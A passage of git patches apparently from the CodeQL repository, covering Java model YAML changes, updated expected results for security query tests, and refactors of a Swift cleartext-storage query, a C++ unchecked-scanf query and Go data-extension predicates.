$hasValueFlow - AtomicReference ar = new AtomicReference(source()); sink(ar.get()); // $hasValueFlow - // java.util.concurrent - CountDownLatch cdl = new CountDownLatch((int)source()); - sink(cdl.getCount()); // $hasValueFlow - // java.util.function Function func = a -> a + ""; sink(func.apply(source())); // $hasTaintFlow From ce74c9d9592cb2044ddbef93d393021cb857ff37 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 11 Jan 2023 22:15:41 -0500 Subject: [PATCH 199/381] Java: Date models as neutral --- java/ql/lib/ext/java.text.model.yml | 6 ++++-- java/ql/lib/ext/java.time.model.yml | 5 ++++- java/ql/src/Telemetry/ExternalApi.qll | 1 - 3 files changed, 8 insertions(+), 4 deletions(-) diff --git a/java/ql/lib/ext/java.text.model.yml b/java/ql/lib/ext/java.text.model.yml index edf2a4c7d60..bbb01596f17 100644 --- a/java/ql/lib/ext/java.text.model.yml +++ b/java/ql/lib/ext/java.text.model.yml @@ -3,5 +3,7 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.text", "DateFormat", "format", "(Date)", "manual"] - - ["java.text", "SimpleDateFormat", "SimpleDateFormat", "(String)", "manual"] + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.text", "DateFormat", "format", "(Date)", "manual"] # taint-numeric + - ["java.text", "SimpleDateFormat", "SimpleDateFormat", "(String)", "manual"] # taint-numeric diff --git a/java/ql/lib/ext/java.time.model.yml b/java/ql/lib/ext/java.time.model.yml index 1a9b745f403..002240c6488 100644 --- a/java/ql/lib/ext/java.time.model.yml +++ b/java/ql/lib/ext/java.time.model.yml @@ -4,5 +4,8 @@ extensions: extensible: neutralModel data: - ["java.time", "Instant", "now", "()", "manual"] - - ["java.time", "LocalDate", "of", "(int,int,int)", "manual"] - ["java.time", "ZonedDateTime", "now", "()", "manual"] + + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.time", "LocalDate", "of", "(int,int,int)", "manual"] # taint-numeric diff --git a/java/ql/src/Telemetry/ExternalApi.qll b/java/ql/src/Telemetry/ExternalApi.qll index 6a51d20e8f5..2f7ebcc9d19 100644 --- a/java/ql/src/Telemetry/ExternalApi.qll +++ b/java/ql/src/Telemetry/ExternalApi.qll @@ -47,7 +47,6 @@ class ExternalApi extends Callable { * Gets information about the external API in the form expected by the CSV modeling framework. */ string getApiName() { - this.getName() = "append" and result = this.getDeclaringType().getPackage() + "." + this.getDeclaringType().getSourceDeclaration() + "#" + this.getName() + paramsString(this) From fd593fd4f05b4dd1a6498ae33cc75621d896edd8 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 11 Jan 2023 22:34:19 -0500 Subject: [PATCH 200/381] Java: undo changes to tests that were affected by numeric-flow summary models --- .../security/CWE-400/ThreadResourceAbuse.expected | 10 ---------- .../security/CWE-755/NFEAndroidDoS.expected | 6 ------ ...roperValidationOfArrayConstructionLocal.expected | 4 ---- .../ImproperValidationOfArrayIndexLocal.expected | 3 --- .../semmle/tests/ArithmeticTaintedLocal.expected | 13 ------------- .../semmle/tests/NumericCastTaintedLocal.expected | 3 --- 6 files changed, 39 deletions(-) diff --git a/java/ql/test/experimental/query-tests/security/CWE-400/ThreadResourceAbuse.expected b/java/ql/test/experimental/query-tests/security/CWE-400/ThreadResourceAbuse.expected index f8d18994ac0..a510070daf9 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-400/ThreadResourceAbuse.expected +++ b/java/ql/test/experimental/query-tests/security/CWE-400/ThreadResourceAbuse.expected @@ -12,14 +12,8 @@ edges | ThreadResourceAbuse.java:71:15:71:17 | parameter this [waitTime] : Number | ThreadResourceAbuse.java:74:18:74:25 | this <.field> [waitTime] : Number | | ThreadResourceAbuse.java:74:18:74:25 | this <.field> [waitTime] : Number | ThreadResourceAbuse.java:74:18:74:25 | waitTime | | ThreadResourceAbuse.java:141:27:141:43 | getValue(...) : String | ThreadResourceAbuse.java:144:34:144:42 | delayTime | -| ThreadResourceAbuse.java:172:19:172:50 | getHeader(...) : String | ThreadResourceAbuse.java:173:37:173:42 | header : String | | ThreadResourceAbuse.java:172:19:172:50 | getHeader(...) : String | ThreadResourceAbuse.java:176:17:176:26 | retryAfter | -| ThreadResourceAbuse.java:173:20:173:43 | parseInt(...) : Number | ThreadResourceAbuse.java:176:17:176:26 | retryAfter | -| ThreadResourceAbuse.java:173:37:173:42 | header : String | ThreadResourceAbuse.java:173:20:173:43 | parseInt(...) : Number | -| ThreadResourceAbuse.java:206:28:206:56 | getParameter(...) : String | ThreadResourceAbuse.java:207:39:207:52 | uploadDelayStr : String | | ThreadResourceAbuse.java:206:28:206:56 | getParameter(...) : String | ThreadResourceAbuse.java:209:49:209:59 | uploadDelay : Number | -| ThreadResourceAbuse.java:207:22:207:53 | parseInt(...) : Number | ThreadResourceAbuse.java:209:49:209:59 | uploadDelay : Number | -| ThreadResourceAbuse.java:207:39:207:52 | uploadDelayStr : String | ThreadResourceAbuse.java:207:22:207:53 | parseInt(...) : Number | | ThreadResourceAbuse.java:209:30:209:87 | new UploadListener(...) [slowUploads] : Number | UploadListener.java:28:14:28:19 | parameter this [slowUploads] : Number | | ThreadResourceAbuse.java:209:49:209:59 | uploadDelay : Number | ThreadResourceAbuse.java:209:30:209:87 | new UploadListener(...) [slowUploads] : Number | | ThreadResourceAbuse.java:209:49:209:59 | uploadDelay : Number | UploadListener.java:15:24:15:44 | sleepMilliseconds : Number | @@ -48,12 +42,8 @@ nodes | ThreadResourceAbuse.java:141:27:141:43 | getValue(...) : String | semmle.label | getValue(...) : String | | ThreadResourceAbuse.java:144:34:144:42 | delayTime | semmle.label | delayTime | | ThreadResourceAbuse.java:172:19:172:50 | getHeader(...) : String | semmle.label | getHeader(...) : String | -| ThreadResourceAbuse.java:173:20:173:43 | parseInt(...) : Number | semmle.label | parseInt(...) : Number | -| ThreadResourceAbuse.java:173:37:173:42 | header : String | semmle.label | header : String | | ThreadResourceAbuse.java:176:17:176:26 | retryAfter | semmle.label | retryAfter | | ThreadResourceAbuse.java:206:28:206:56 | getParameter(...) : String | semmle.label | getParameter(...) : String | -| ThreadResourceAbuse.java:207:22:207:53 | parseInt(...) : Number | semmle.label | parseInt(...) : Number | -| ThreadResourceAbuse.java:207:39:207:52 | uploadDelayStr : String | semmle.label | uploadDelayStr : String | | ThreadResourceAbuse.java:209:30:209:87 | new UploadListener(...) [slowUploads] : Number | semmle.label | new UploadListener(...) [slowUploads] : Number | | ThreadResourceAbuse.java:209:49:209:59 | uploadDelay : Number | semmle.label | uploadDelay : Number | | UploadListener.java:15:24:15:44 | sleepMilliseconds : Number | semmle.label | sleepMilliseconds : Number | diff --git a/java/ql/test/experimental/query-tests/security/CWE-755/NFEAndroidDoS.expected b/java/ql/test/experimental/query-tests/security/CWE-755/NFEAndroidDoS.expected index 29c1daf500c..73657a38158 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-755/NFEAndroidDoS.expected +++ b/java/ql/test/experimental/query-tests/security/CWE-755/NFEAndroidDoS.expected @@ -3,12 +3,8 @@ edges | NFEAndroidDoS.java:13:24:13:61 | getStringExtra(...) : Object | NFEAndroidDoS.java:14:21:14:51 | parseDouble(...) | | NFEAndroidDoS.java:22:21:22:31 | getIntent(...) : Intent | NFEAndroidDoS.java:22:21:22:55 | getStringExtra(...) : Object | | NFEAndroidDoS.java:22:21:22:55 | getStringExtra(...) : Object | NFEAndroidDoS.java:23:15:23:40 | parseInt(...) | -| NFEAndroidDoS.java:22:21:22:55 | getStringExtra(...) : Object | NFEAndroidDoS.java:23:32:23:39 | widthStr : Object | -| NFEAndroidDoS.java:23:32:23:39 | widthStr : Object | NFEAndroidDoS.java:23:15:23:40 | parseInt(...) | | NFEAndroidDoS.java:25:22:25:32 | getIntent(...) : Intent | NFEAndroidDoS.java:25:22:25:57 | getStringExtra(...) : Object | | NFEAndroidDoS.java:25:22:25:57 | getStringExtra(...) : Object | NFEAndroidDoS.java:26:16:26:42 | parseInt(...) | -| NFEAndroidDoS.java:25:22:25:57 | getStringExtra(...) : Object | NFEAndroidDoS.java:26:33:26:41 | heightStr : Object | -| NFEAndroidDoS.java:26:33:26:41 | heightStr : Object | NFEAndroidDoS.java:26:16:26:42 | parseInt(...) | | NFEAndroidDoS.java:43:24:43:34 | getIntent(...) : Intent | NFEAndroidDoS.java:43:24:43:61 | getStringExtra(...) : Object | | NFEAndroidDoS.java:43:24:43:61 | getStringExtra(...) : Object | NFEAndroidDoS.java:44:21:44:43 | new Double(...) | | NFEAndroidDoS.java:43:24:43:61 | getStringExtra(...) : Object | NFEAndroidDoS.java:47:21:47:47 | valueOf(...) | @@ -19,11 +15,9 @@ nodes | NFEAndroidDoS.java:22:21:22:31 | getIntent(...) : Intent | semmle.label | getIntent(...) : Intent | | NFEAndroidDoS.java:22:21:22:55 | getStringExtra(...) : Object | semmle.label | getStringExtra(...) : Object | | NFEAndroidDoS.java:23:15:23:40 | parseInt(...) | semmle.label | parseInt(...) | -| NFEAndroidDoS.java:23:32:23:39 | widthStr : Object | semmle.label | widthStr : Object | | NFEAndroidDoS.java:25:22:25:32 | getIntent(...) : Intent | semmle.label | getIntent(...) : Intent | | NFEAndroidDoS.java:25:22:25:57 | getStringExtra(...) : Object | semmle.label | getStringExtra(...) : Object | | NFEAndroidDoS.java:26:16:26:42 | parseInt(...) | semmle.label | parseInt(...) | -| NFEAndroidDoS.java:26:33:26:41 | heightStr : Object | semmle.label | heightStr : Object | | NFEAndroidDoS.java:43:24:43:34 | getIntent(...) : Intent | semmle.label | getIntent(...) : Intent | | NFEAndroidDoS.java:43:24:43:61 | getStringExtra(...) : Object | semmle.label | getStringExtra(...) : Object | | NFEAndroidDoS.java:44:21:44:43 | new Double(...) | semmle.label | new Double(...) | diff --git a/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayConstructionLocal.expected b/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayConstructionLocal.expected index 466e2b10de4..abfb68f74a5 100644 --- a/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayConstructionLocal.expected +++ b/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayConstructionLocal.expected @@ -1,14 +1,10 @@ edges | Test.java:76:27:76:60 | getProperty(...) : String | Test.java:78:37:78:48 | userProperty : String | -| Test.java:78:20:78:56 | parseInt(...) : Number | Test.java:80:31:80:34 | size | -| Test.java:78:20:78:56 | parseInt(...) : Number | Test.java:86:34:86:37 | size | | Test.java:78:37:78:48 | userProperty : String | Test.java:78:37:78:55 | trim(...) : String | -| Test.java:78:37:78:55 | trim(...) : String | Test.java:78:20:78:56 | parseInt(...) : Number | | Test.java:78:37:78:55 | trim(...) : String | Test.java:80:31:80:34 | size | | Test.java:78:37:78:55 | trim(...) : String | Test.java:86:34:86:37 | size | nodes | Test.java:76:27:76:60 | getProperty(...) : String | semmle.label | getProperty(...) : String | -| Test.java:78:20:78:56 | parseInt(...) : Number | semmle.label | parseInt(...) : Number | | Test.java:78:37:78:48 | userProperty : String | semmle.label | userProperty : String | | Test.java:78:37:78:55 | trim(...) : String | semmle.label | trim(...) : String | | Test.java:80:31:80:34 | size | semmle.label | size | diff --git a/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayIndexLocal.expected b/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayIndexLocal.expected index 6c932250e72..6e0738c8576 100644 --- a/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayIndexLocal.expected +++ b/java/ql/test/query-tests/security/CWE-129/semmle/tests/ImproperValidationOfArrayIndexLocal.expected @@ -1,12 +1,9 @@ edges | Test.java:14:27:14:60 | getProperty(...) : String | Test.java:16:38:16:49 | userProperty : String | -| Test.java:16:21:16:57 | parseInt(...) : Number | Test.java:19:34:19:38 | index | | Test.java:16:38:16:49 | userProperty : String | Test.java:16:38:16:56 | trim(...) : String | -| Test.java:16:38:16:56 | trim(...) : String | Test.java:16:21:16:57 | parseInt(...) : Number | | Test.java:16:38:16:56 | trim(...) : String | Test.java:19:34:19:38 | index | nodes | Test.java:14:27:14:60 | getProperty(...) : String | semmle.label | getProperty(...) : String | -| Test.java:16:21:16:57 | parseInt(...) : Number | semmle.label | parseInt(...) : Number | | Test.java:16:38:16:49 | userProperty : String | semmle.label | userProperty : String | | Test.java:16:38:16:56 | trim(...) : String | semmle.label | trim(...) : String | | Test.java:19:34:19:38 | index | semmle.label | index | diff --git a/java/ql/test/query-tests/security/CWE-190/semmle/tests/ArithmeticTaintedLocal.expected b/java/ql/test/query-tests/security/CWE-190/semmle/tests/ArithmeticTaintedLocal.expected index 188d0fafe6a..4d37fd48f49 100644 --- a/java/ql/test/query-tests/security/CWE-190/semmle/tests/ArithmeticTaintedLocal.expected +++ b/java/ql/test/query-tests/security/CWE-190/semmle/tests/ArithmeticTaintedLocal.expected @@ -11,19 +11,8 @@ edges | ArithmeticTainted.java:19:26:19:39 | readerBuffered : BufferedReader | ArithmeticTainted.java:19:26:19:50 | readLine(...) : String | | ArithmeticTainted.java:19:26:19:50 | readLine(...) : String | ArithmeticTainted.java:21:29:21:40 | stringNumber : String | | ArithmeticTainted.java:19:26:19:50 | readLine(...) : String | ArithmeticTainted.java:21:29:21:40 | stringNumber : String | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:32:17:32:20 | data | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:40:17:40:20 | data | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:50:17:50:20 | data | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:64:20:64:23 | data : Number | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:95:37:95:40 | data | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:118:9:118:12 | data : Number | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:119:10:119:13 | data : Number | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:120:10:120:13 | data : Number | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | ArithmeticTainted.java:121:10:121:13 | data : Number | | ArithmeticTainted.java:21:29:21:40 | stringNumber : String | ArithmeticTainted.java:21:29:21:47 | trim(...) : String | | ArithmeticTainted.java:21:29:21:40 | stringNumber : String | ArithmeticTainted.java:21:29:21:47 | trim(...) : String | -| ArithmeticTainted.java:21:29:21:47 | trim(...) : String | ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | -| ArithmeticTainted.java:21:29:21:47 | trim(...) : String | ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | | ArithmeticTainted.java:21:29:21:47 | trim(...) : String | ArithmeticTainted.java:32:17:32:20 | data | | ArithmeticTainted.java:21:29:21:47 | trim(...) : String | ArithmeticTainted.java:40:17:40:20 | data | | ArithmeticTainted.java:21:29:21:47 | trim(...) : String | ArithmeticTainted.java:50:17:50:20 | data | @@ -64,8 +53,6 @@ nodes | ArithmeticTainted.java:19:26:19:39 | readerBuffered : BufferedReader | semmle.label | readerBuffered : BufferedReader | | ArithmeticTainted.java:19:26:19:50 | readLine(...) : String | semmle.label | readLine(...) : String | | ArithmeticTainted.java:19:26:19:50 | readLine(...) : String | semmle.label | readLine(...) : String | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | semmle.label | parseInt(...) : Number | -| ArithmeticTainted.java:21:12:21:48 | parseInt(...) : Number | semmle.label | parseInt(...) : Number | | ArithmeticTainted.java:21:29:21:40 | stringNumber : String | semmle.label | stringNumber : String | | ArithmeticTainted.java:21:29:21:40 | stringNumber : String | semmle.label | stringNumber : String | | ArithmeticTainted.java:21:29:21:47 | trim(...) : String | semmle.label | trim(...) : String | diff --git a/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected b/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected index 7a9330e8220..6ab99919c33 100644 --- a/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected +++ b/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected @@ -4,9 +4,7 @@ edges | Test.java:11:28:11:36 | System.in : InputStream | Test.java:11:6:11:46 | new InputStreamReader(...) : InputStreamReader | | Test.java:12:26:12:39 | readerBuffered : BufferedReader | Test.java:12:26:12:50 | readLine(...) : String | | Test.java:12:26:12:50 | readLine(...) : String | Test.java:14:27:14:38 | stringNumber : String | -| Test.java:14:12:14:46 | parseLong(...) : Number | Test.java:21:22:21:25 | data | | Test.java:14:27:14:38 | stringNumber : String | Test.java:14:27:14:45 | trim(...) : String | -| Test.java:14:27:14:45 | trim(...) : String | Test.java:14:12:14:46 | parseLong(...) : Number | | Test.java:14:27:14:45 | trim(...) : String | Test.java:21:22:21:25 | data | nodes | Test.java:10:36:11:47 | new BufferedReader(...) : BufferedReader | semmle.label | new BufferedReader(...) : BufferedReader | @@ -14,7 +12,6 @@ nodes | Test.java:11:28:11:36 | System.in : InputStream | semmle.label | System.in : InputStream | | Test.java:12:26:12:39 | readerBuffered : BufferedReader | semmle.label | readerBuffered : BufferedReader | | Test.java:12:26:12:50 | readLine(...) : String | semmle.label | readLine(...) : String | -| Test.java:14:12:14:46 | parseLong(...) : Number | semmle.label | parseLong(...) : Number | | Test.java:14:27:14:38 | stringNumber : String | semmle.label | stringNumber : String | | Test.java:14:27:14:45 | trim(...) : String | semmle.label | trim(...) : String | | Test.java:21:22:21:25 | data | semmle.label | data | From 994ea704dae252ddc7937abc827ca30b56adfbea Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 12 Jan 2023 09:31:48 +0000 Subject: [PATCH 201/381] Swift: Clean up the QL a little. --- .../queries/Security/CWE-311/CleartextStorageDatabase.ql | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql index 2eddbeeedaf..bd72c904745 100644 --- a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql +++ b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql @@ -93,10 +93,9 @@ class CleartextStorageConfig extends TaintTracking::Configuration { // for example in `realmObj.data = sensitive`. isSink(node) and exists(ClassOrStructDecl cd, IterableDeclContext cx | - (cx = cd or cx.(ExtensionDecl).getExtendedTypeDecl() = cd) and - c.getAReadContent().(DataFlow::Content::FieldContent).getField() = cx.getAMember() and - // TODO: add a `getAMember` version that accounts for extensions? - cd.getABaseTypeDecl*().getName() = ["NSManagedObject", "RealmSwiftObject"] + cd.getABaseTypeDecl*().getName() = ["NSManagedObject", "RealmSwiftObject"] and + cx.getNominalTypeDecl() = cd and + c.getAReadContent().(DataFlow::Content::FieldContent).getField() = cx.getAMember() ) or // any default implicit reads From 1ae52b6c7ede31138ac1bff8a516d7816fae24d4 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Thu, 12 Jan 2023 10:06:39 +0000 Subject: [PATCH 202/381] C++: Speedup 'MissingCheckScanf'. --- cpp/ql/src/Critical/MissingCheckScanf.ql | 255 ++++++++++++++++------- 1 file changed, 179 insertions(+), 76 deletions(-) diff --git a/cpp/ql/src/Critical/MissingCheckScanf.ql b/cpp/ql/src/Critical/MissingCheckScanf.ql index 29f1c2b07ad..5d81a3f9e49 100644 --- a/cpp/ql/src/Critical/MissingCheckScanf.ql +++ b/cpp/ql/src/Critical/MissingCheckScanf.ql @@ -20,81 +20,187 @@ import semmle.code.cpp.dataflow.DataFlow import semmle.code.cpp.ir.IR import semmle.code.cpp.ir.ValueNumbering -/** An expression appearing as an output argument to a `scanf`-like call */ -class ScanfOutput extends Expr { - ScanfFunctionCall call; - int varargIndex; - Instruction instr; - ValueNumber valNum; +/** + * Holds if `call` is a `scanf`-like function that may write to `output` at index `index`. + * + * Furthermore, `instr` is the instruction that defines the address of the `index`'th argument + * of `call`, and `vn` is the value number of `instr.` + */ +predicate isSource(ScanfFunctionCall call, int index, Instruction instr, ValueNumber vn, Expr output) { + output = call.getOutputArgument(index).getFullyConverted() and + instr.getConvertedResultExpression() = output and + vn.getAnInstruction() = instr +} - ScanfOutput() { - this = call.getOutputArgument(varargIndex).getFullyConverted() and - instr.getConvertedResultExpression() = this and - valueNumber(instr) = valNum - } +/** + * Holds if `instr` is control-flow reachable in 0 or more steps from an a call + * to a call to a `scanf`-like function. + */ +pragma[nomagic] +predicate fwdFlow0(Instruction instr) { + isSource(_, _, instr, _, _) + or + exists(Instruction prev | + fwdFlow0(prev) and + prev.getASuccessor() = instr + ) +} - ScanfFunctionCall getCall() { result = call } +/** + * Holds if `instr` is part of the IR translation of `access` that + * is not an expression being deallocated, and `instr` has value + * number `vn`. + */ +predicate isSink(Instruction instr, Access access, ValueNumber vn) { + instr.getAst() = access and + not any(DeallocationExpr dealloc).getFreedExpr() = access and + vn.getAnInstruction() = instr +} - /** - * Returns the smallest possible `scanf` return value that would indicate - * success in writing this output argument. - */ - int getMinimumGuardConstant() { - result = - varargIndex + 1 - - count(ScanfFormatLiteral f, int n | - // Special case: %n writes to an argument without reading any input. - // It does not increase the count returned by `scanf`. - n <= varargIndex and f.getUse() = call and f.getConversionChar(n) = "n" - ) - } - - predicate hasGuardedAccess(Access e, boolean isGuarded) { - e = this.getAnAccess() and - if - exists(int value, int minGuard | minGuard = this.getMinimumGuardConstant() | - e.getBasicBlock() = blockGuardedBy(value, "==", call) and minGuard <= value - or - e.getBasicBlock() = blockGuardedBy(value, "<", call) and minGuard - 1 <= value - or - e.getBasicBlock() = blockGuardedBy(value, "<=", call) and minGuard <= value - ) - then isGuarded = true - else isGuarded = false - } - - /** - * Get a subsequent access of the same underlying storage, - * but before it gets reset or reused in another `scanf` call. - */ - Access getAnAccess() { - exists(Instruction dst | - this.bigStep() = dst and - dst.getAst() = result and - valueNumber(dst) = valNum - ) - } - - private Instruction bigStep() { - result = this.smallStep(instr) +/** + * Holds if `instr` is part of a path from a call to a `scanf`-like function + * to a use of the written variable. + */ +pragma[nomagic] +predicate revFlow0(Instruction instr) { + fwdFlow0(instr) and + ( + isSink(instr, _, _) or - exists(Instruction i | i = this.bigStep() | result = this.smallStep(i)) - } + exists(Instruction succ | revFlow0(succ) | instr.getASuccessor() = succ) + ) +} - private Instruction smallStep(Instruction i) { - instr.getASuccessor*() = i and - i.getASuccessor() = result and - not this.isBarrier(result) - } - - private predicate isBarrier(Instruction i) { - valueNumber(i) = valNum and - exists(Expr e | i.getAst() = e | - i = any(StoreInstruction s).getDestinationAddress() - or - [e, e.getParent().(AddressOfExpr)] instanceof ScanfOutput +/** + * Holds if `instr` is part of a path from a call `to a `scanf`-like function + * that writes to a variable with value number `vn`, without passing through + * redefinitions of the variable. + */ +pragma[nomagic] +private predicate fwdFlow(Instruction instr, ValueNumber vn) { + revFlow0(instr) and + ( + isSource(_, _, instr, vn, _) + or + exists(Instruction prev | + fwdFlow(prev, vn) and + prev.getASuccessor() = instr and + not isBarrier(instr, vn) ) - } + ) +} + +/** + * Holds if `instr` is part of a path from a call `to a `scanf`-like function + * that writes to a variable with value number `vn`, without passing through + * redefinitions of the variable. + */ +pragma[nomagic] +predicate revFlow(Instruction instr, ValueNumber vn) { + fwdFlow(instr, vn) and + ( + isSink(instr, _, vn) + or + exists(Instruction succ | revFlow(succ, vn) | + instr.getASuccessor() = succ and + not isBarrier(succ, vn) + ) + ) +} + +/** + * A type that bundles together a reachable instruction with the appropriate + * value number (i.e., the value number that's transferred from the source + * to the sink). + */ +newtype TNode = MkNode(Instruction instr, ValueNumber vn) { revFlow(instr, vn) } + +class Node extends MkNode { + ValueNumber vn; + Instruction instr; + + Node() { this = MkNode(instr, vn) } + + final string toString() { result = instr.toString() } + + final Node getASuccessor() { result = MkNode(instr.getASuccessor(), vn) } + + final Location getLocation() { result = instr.getLocation() } +} + +/** + * Holds if `instr` is an instruction with value number `vn` that is + * used in a store operation, or is overwritten by another call to + * a `scanf`-like function. + */ +private predicate isBarrier(Instruction instr, ValueNumber vn) { + // We only need to compute barriers for instructions that we + // managed to hit during the initial flow stage. + revFlow0(pragma[only_bind_into](instr)) and + valueNumber(instr) = vn and + exists(Expr e | instr.getAst() = e | + instr = any(StoreInstruction s).getDestinationAddress() + or + isSource(_, _, _, _, [e, e.getParent().(AddressOfExpr)]) + ) +} + +/** Holds if `n1` steps to `n2` in a single step. */ +predicate isSuccessor(Node n1, Node n2) { n1.getASuccessor() = n2 } + +predicate hasFlow(Node n1, Node n2) = fastTC(isSuccessor/2)(n1, n2) + +Node getNode(Instruction instr, ValueNumber vn) { result = MkNode(instr, vn) } + +/** + * Holds if `source` is the `index`'th argument to the `scanf`-like call `call`, and `sink` is + * an instruction that is part of the translation of `access` which is a transitive + * control-flow successor of `call`. + * + * Furthermore, `source` and `sink` have identical global value numbers. + */ +predicate hasFlow( + Instruction source, ScanfFunctionCall call, int index, Instruction sink, Access access +) { + exists(ValueNumber vn | + isSource(call, index, source, vn, _) and + hasFlow(getNode(source, vn), getNode(sink, vn)) and + isSink(sink, access, vn) + ) +} + +/** + * Gets the smallest possible `scanf` return value of `call` that would indicate + * success in writing the output argument at index `index`. + */ +int getMinimumGuardConstant(ScanfFunctionCall call, int index) { + isSource(call, index, _, _, _) and + result = + index + 1 - + count(ScanfFormatLiteral f, int n | + // Special case: %n writes to an argument without reading any input. + // It does not increase the count returned by `scanf`. + n <= index and f.getUse() = call and f.getConversionChar(n) = "n" + ) +} + +/** + * Holds the access to `e` isn't guarded by a check that ensures that `call` returned + * at least `minGuard`. + */ +predicate hasNonGuardedAccess(ScanfFunctionCall call, Access e, int minGuard) { + exists(int index | + hasFlow(_, call, index, _, e) and + minGuard = getMinimumGuardConstant(call, index) + | + not exists(int value | + e.getBasicBlock() = blockGuardedBy(value, "==", call) and minGuard <= value + or + e.getBasicBlock() = blockGuardedBy(value, "<", call) and minGuard - 1 <= value + or + e.getBasicBlock() = blockGuardedBy(value, "<=", call) and minGuard <= value + ) + ) } /** Returns a block guarded by the assertion of `value op call` */ @@ -112,12 +218,9 @@ BasicBlock blockGuardedBy(int value, string op, ScanfFunctionCall call) { ) } -from ScanfOutput output, ScanfFunctionCall call, Access access -where - output.getCall() = call and - output.hasGuardedAccess(access, false) and - not exists(DeallocationExpr dealloc | dealloc.getFreedExpr() = access) +from ScanfFunctionCall call, Access access, int minGuard +where hasNonGuardedAccess(call, access, minGuard) select access, "This variable is read, but may not have been written. " + - "It should be guarded by a check that the $@ returns at least " + - output.getMinimumGuardConstant() + ".", call, call.toString() + "It should be guarded by a check that the $@ returns at least " + minGuard + ".", call, + call.toString() From 0f993a0d267fe9d358afb7c482ace11767273bdb Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 13:48:04 +0100 Subject: [PATCH 203/381] Go: Prepare library for adding extensions. --- go/ql/lib/qlpack.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/go/ql/lib/qlpack.yml b/go/ql/lib/qlpack.yml index a38974a0fd9..140062a39fe 100644 --- a/go/ql/lib/qlpack.yml +++ b/go/ql/lib/qlpack.yml @@ -7,4 +7,5 @@ library: true upgrades: upgrades dependencies: codeql/tutorial: ${workspace} - +dataExtensions: + - ext/*.model.yml From 5fd687d3df78b818415b4da908b02f943fcc3204 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 19 Dec 2022 13:48:44 +0100 Subject: [PATCH 204/381] Go: Add MaD related extensible predicates. --- go/ql/lib/semmle/go/dataflow/ExternalFlow.qll | 1 + .../go/dataflow/ExternalFlowExtensions.qll | 27 +++++++++++++++++++ 2 files changed, 28 insertions(+) create mode 100644 go/ql/lib/semmle/go/dataflow/ExternalFlowExtensions.qll diff --git a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll index f3213e78627..1392f849201 100644 --- a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll +++ b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll @@ -61,6 +61,7 @@ */ private import go +private import ExternalFlowExtensions as Extensions private import internal.DataFlowPrivate private import internal.FlowSummaryImpl::Private::External private import internal.FlowSummaryImplSpecific diff --git a/go/ql/lib/semmle/go/dataflow/ExternalFlowExtensions.qll b/go/ql/lib/semmle/go/dataflow/ExternalFlowExtensions.qll new file mode 100644 index 00000000000..24a8ddf4b8d --- /dev/null +++ b/go/ql/lib/semmle/go/dataflow/ExternalFlowExtensions.qll @@ -0,0 +1,27 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if a source model exists for the given parameters. + */ +extensible predicate sourceModel( + string package, string type, boolean subtypes, string name, string signature, string ext, + string output, string kind, string provenance +); + +/** + * Holds if a sink model exists for the given parameters. + */ +extensible predicate sinkModel( + string package, string type, boolean subtypes, string name, string signature, string ext, + string input, string kind, string provenance +); + +/** + * Holds if a summary model exists for the given parameters. + */ +extensible predicate summaryModel( + string package, string type, boolean subtypes, string name, string signature, string ext, + string input, string output, string kind, string provenance +); From ebb3485a7343b2683559e2a88c7b481555a841ba Mon Sep 17 00:00:00 2001 From: Michael Nebel 